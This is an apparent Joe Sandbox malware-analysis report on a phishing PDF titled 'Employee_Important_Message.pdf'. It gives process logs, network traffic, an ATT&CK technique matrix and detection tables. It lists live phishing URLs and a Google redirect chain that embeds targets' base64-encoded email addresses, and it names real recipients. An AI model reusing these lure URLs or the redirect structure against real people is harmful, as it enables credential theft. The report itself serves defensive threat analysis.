Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.winPDF@30/53@21/9
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-02 11-55-06-359.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1616,i,3436419427165153113,17725779986340987366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.sn/url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bGhlYXJkQHdjLmNvbQ==
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1960,i,2475792775790874993,11739866391639367341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1616,i,3436419427165153113,17725779986340987366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1960,i,2475792775790874993,11739866391639367341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Employee_Important_Message.pdfInitial sample: PDF keyword /JS count = 0
Source: Employee_Important_Message.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: A9xjsqnr_k2x77n_1c4.tmp.0.drInitial sample: PDF keyword /JS count = 0
Source: A9xjsqnr_k2x77n_1c4.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
Source: Employee_Important_Message.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://apnasofa.com/episode/index#100%Avira URL Cloudmalware
https://apnasofa.com/episode/script.js100%Avira URL Cloudmalware
https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html0%Avira URL Cloudsafe
https://apnasofa.com/episode/style.css100%Avira URL Cloudmalware
https://apnasofa.com/episode/image/logo.png100%Avira URL Cloudmalware
https://apnasofa.com/episode/index100%Avira URL Cloudmalware
https://apnasofa.com/favicon.ico100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
ipwhois.app
103.126.138.87
truefalse
    high
    www.google.sn
    172.217.19.227
    truefalse
      high
      www.google.com
      142.250.181.100
      truefalse
        high
        api.ipify.org
        104.26.12.205
        truefalse
          high
          default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
          84.201.208.99
          truefalse
            high
            apnasofa.com
            103.160.107.138
            truefalse
              high
              s3-r-w.us-east-1.amazonaws.com
              52.217.199.10
              truefalse
                high
                i--iy.s3.us-east-1.amazonaws.com
                unknown
                unknownfalse
                  unknown
                  x1.i.lencr.org
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://apnasofa.com/favicon.icofalse
                    • Avira URL Cloud: malware
                    unknown
                    https://www.google.sn/url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                      high
                      https://www.google.sn/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                        high
                        https://apnasofa.com/episode/script.jsfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ipwhois.app/json/8.46.123.228false
                          high
                          https://apnasofa.com/episode/image/logo.pngfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==true
                          • SlashNext: Credential Stealing type: Phishing & Social Engineering
                          unknown
                          https://apnasofa.com/episode/style.cssfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://api.ipify.org/?format=jsonfalse
                            high
                            https://apnasofa.com/episode/indexfalse
                            • Avira URL Cloud: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                              high
                              https://apnasofa.com/episode/index#chromecache_162.5.drfalse
                              • Avira URL Cloud: malware
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              172.217.19.227
                              www.google.snUnited States
                              15169GOOGLEUSfalse
                              104.26.12.205
                              api.ipify.orgUnited States
                              13335CLOUDFLARENETUSfalse
                              103.160.107.138
                              apnasofa.comunknown
                              7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                              142.250.181.100
                              www.google.comUnited States
                              15169GOOGLEUSfalse
                              239.255.255.250
                              unknownReserved
                              unknownunknownfalse
                              52.217.199.10
                              s3-r-w.us-east-1.amazonaws.comUnited States
                              16509AMAZON-02USfalse
                              104.26.13.205
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              103.126.138.87
                              ipwhois.appUnited States
                              40676AS40676USfalse
                              IP
                              192.168.2.4
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1566807
                              Start date and time:2024-12-02 17:54:12 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowspdfcookbook.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Employee_Important_Message.pdf
                              Detection:MAL
                              Classification:mal64.phis.winPDF@30/53@21/9
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .pdf
                              • Found PDF document
                              • Close Viewer
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 23.32.184.135, 216.58.208.227, 172.217.17.46, 74.125.205.84, 2.19.126.149, 2.19.126.143, 172.64.41.3, 162.159.61.3, 52.22.41.97, 3.233.129.217, 52.6.155.20, 3.219.243.226, 34.104.35.123, 23.195.39.65, 84.201.208.99, 2.20.40.170, 192.229.221.95, 172.217.19.202, 172.217.17.42, 142.250.181.106, 172.217.19.234, 142.250.181.74, 142.250.181.42, 172.217.17.74, 172.217.21.42, 172.217.17.67, 172.217.17.78
                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: Employee_Important_Message.pdf
                              TimeTypeDescription
                              11:55:15API Interceptor2x Sleep call for process: AcroCEF.exe modified
                              SourceURL
                              Screenshothttps://www.google.sn/url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bGhlYXJkQHdjLmNvbQ==
                              Screenshothttps://www.google.sn/url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bGhlYXJkQHdjLmNvbQ==
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                              • api.ipify.org/
                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                              • api.ipify.org/
                              perfcc.elfGet hashmaliciousXmrigBrowse
                              • api.ipify.org/
                              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              103.160.107.138Employee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Get hashmaliciousUnknownBrowse
                                  Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                    https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                      239.255.255.250ATT4802.htmlGet hashmaliciousUnknownBrowse
                                        Flumroc.docxGet hashmaliciousUnknownBrowse
                                          Flumroc.docxGet hashmaliciousUnknownBrowse
                                            http://calcuttaclub.in/images/uanjodgs/florida-access/Get hashmaliciousUnknownBrowse
                                              https://05kqatnrj9s0snah9.phish.farm/XckdRam1iZXdLcHBTUFlJTlR4SkE5bGxnQ0I0VmtpVFhRWTltRlk3ejQvN2h4WHR0SlJUOXVLRkF5QkQ1R1dlRVVMYWg3RlJPUWwwUFRyeXJqWkhrNHZqU0ErUy9KTC9GRU5UNU9LOFBMaCtIOUgrWG85c2NJdXRVVGY4eG5FVEYrOGgyRGlBQnE2dlQxK1ptMGkvRkUwbkJSMGpnZkMxU2tvSlp3YURJOVFqWkZrV0VLaGJQbldEdS0tV21LS01kOGpOSC9ZWlk0Ry0tZ2ZTcE9EMnkvSHVVSkUvTEhEOWFKQT09?cid=2293724267Get hashmaliciousKnowBe4Browse
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                  https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                    https://merchbkofin.com/Get hashmaliciousUnknownBrowse
                                                      https://public-usa.mkt.dynamics.com/api/orgs/010a432a-e2a3-ef11-8a66-6045bd016f25/r/movKLLTpWUCqpRQQ2_8SfQEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fapp.seesaw.me%252Fpages%252Fshared_item%253Fitem_id%253Ditem.96abdfb3-93cb-482c-822f-f1d275a42e6e%2526share_token%253DDfLCj_YZQZedsrWVvLwerg%2526mode%253Dshare%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=kBeCY6h3I2oKWHussXexCqSpSk%2BEhyyLm0j2TqAuyLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                        https://www.yamajifactory.com/products/-blocks?adr_sou=Facebook&adr_con=scsjchymyyxgs136x&adr_ter=1747260705659006&adr_camId=120212709087730561&adr_adsetId=120212709088740561&adr_adId=120212709088200561&adr_camName=%E5%8F%98%E8%84%B8%E7%A7%AF%E6%9C%A8-%E7%A9%BA-241105-10%E7%BE%8E%E9%87%91+-+%E5%B9%BF%E5%91%8A%E5%89%AF%E6%9C%AC&adr_adsetName=%E7%A9%BA&adr_adName=1&fbclid=IwY2xjawG5dOBleHRuA2FlbQEwAGFkaWQBqxTSdVwj4QEdhDiYdyfw0MIu-_Lo4d4m7akVHEnikvJvX5tkNnnCz6_J__eLEz3mVKk8_aem_PKTifAkeMTNORNhDxlyTuAGet hashmaliciousUnknownBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          apnasofa.comEmployee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                                          • 103.160.107.138
                                                          https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Get hashmaliciousUnknownBrowse
                                                          • 103.160.107.138
                                                          Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                          • 103.160.107.138
                                                          https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                          • 103.160.107.138
                                                          api.ipify.orgl6F8Xgr0Ov.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          SPlVyHiGOz.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 172.67.74.152
                                                          55qIbHIAZi.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 172.67.74.152
                                                          tEEa6j67ss.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          ship's particulars-TBN.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                          • 172.67.74.152
                                                          HBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.26.13.205
                                                          1d5sraR1S1.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          P4toChrGer.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          zed.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.12.205
                                                          ipwhois.appEmployee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                                          • 103.126.138.87
                                                          https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Get hashmaliciousUnknownBrowse
                                                          • 103.126.138.87
                                                          Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                          • 103.126.138.87
                                                          https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                          • 103.126.138.87
                                                          d8EEfAi7tl.vbsGet hashmaliciousMoDiRATBrowse
                                                          • 195.201.57.90
                                                          ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                          • 195.201.57.90
                                                          SecuriteInfo.com.FileRepMalware.9397.20651.exeGet hashmaliciousUnknownBrowse
                                                          • 15.204.213.5
                                                          CbLQcrwzUi.exeGet hashmaliciousUnknownBrowse
                                                          • 15.204.213.5
                                                          AYReport_EN.exeGet hashmaliciousBlackGuardBrowse
                                                          • 15.204.213.5
                                                          Fortnite_CHEAT_CRACKED.exeGet hashmaliciousUnknownBrowse
                                                          • 108.181.47.111
                                                          default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comSPP_14667098030794_8611971920#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 84.201.208.101
                                                          rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 84.201.211.40
                                                          1d5sraR1S1.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 84.201.211.39
                                                          file.exeGet hashmaliciousStealcBrowse
                                                          • 217.20.56.100
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 217.20.56.102
                                                          Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                          • 84.201.208.106
                                                          Scan_6090402.pdfGet hashmaliciousUnknownBrowse
                                                          • 217.20.56.101
                                                          kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                          • 84.201.208.102
                                                          Demande de proposition du Regional Development Network .pdfGet hashmaliciousUnknownBrowse
                                                          • 84.201.208.67
                                                          drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 217.20.56.101
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSATT4802.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          Flumroc.docxGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          Flumroc.docxGet hashmaliciousUnknownBrowse
                                                          • 104.18.94.41
                                                          http://calcuttaclub.in/images/uanjodgs/florida-access/Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          https://05kqatnrj9s0snah9.phish.farm/XckdRam1iZXdLcHBTUFlJTlR4SkE5bGxnQ0I0VmtpVFhRWTltRlk3ejQvN2h4WHR0SlJUOXVLRkF5QkQ1R1dlRVVMYWg3RlJPUWwwUFRyeXJqWkhrNHZqU0ErUy9KTC9GRU5UNU9LOFBMaCtIOUgrWG85c2NJdXRVVGY4eG5FVEYrOGgyRGlBQnE2dlQxK1ptMGkvRkUwbkJSMGpnZkMxU2tvSlp3YURJOVFqWkZrV0VLaGJQbldEdS0tV21LS01kOGpOSC9ZWlk0Ry0tZ2ZTcE9EMnkvSHVVSkUvTEhEOWFKQT09?cid=2293724267Get hashmaliciousKnowBe4Browse
                                                          • 104.17.249.203
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.165.166
                                                          https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.11.207
                                                          https://merchbkofin.com/Get hashmaliciousUnknownBrowse
                                                          • 104.17.249.203
                                                          Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.150.143
                                                          https://www.yamajifactory.com/products/-blocks?adr_sou=Facebook&adr_con=scsjchymyyxgs136x&adr_ter=1747260705659006&adr_camId=120212709087730561&adr_adsetId=120212709088740561&adr_adId=120212709088200561&adr_camName=%E5%8F%98%E8%84%B8%E7%A7%AF%E6%9C%A8-%E7%A9%BA-241105-10%E7%BE%8E%E9%87%91+-+%E5%B9%BF%E5%91%8A%E5%89%AF%E6%9C%AC&adr_adsetName=%E7%A9%BA&adr_adName=1&fbclid=IwY2xjawG5dOBleHRuA2FlbQEwAGFkaWQBqxTSdVwj4QEdhDiYdyfw0MIu-_Lo4d4m7akVHEnikvJvX5tkNnnCz6_J__eLEz3mVKk8_aem_PKTifAkeMTNORNhDxlyTuAGet hashmaliciousUnknownBrowse
                                                          • 104.19.144.58
                                                          CLOUDFLARENETUSATT4802.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
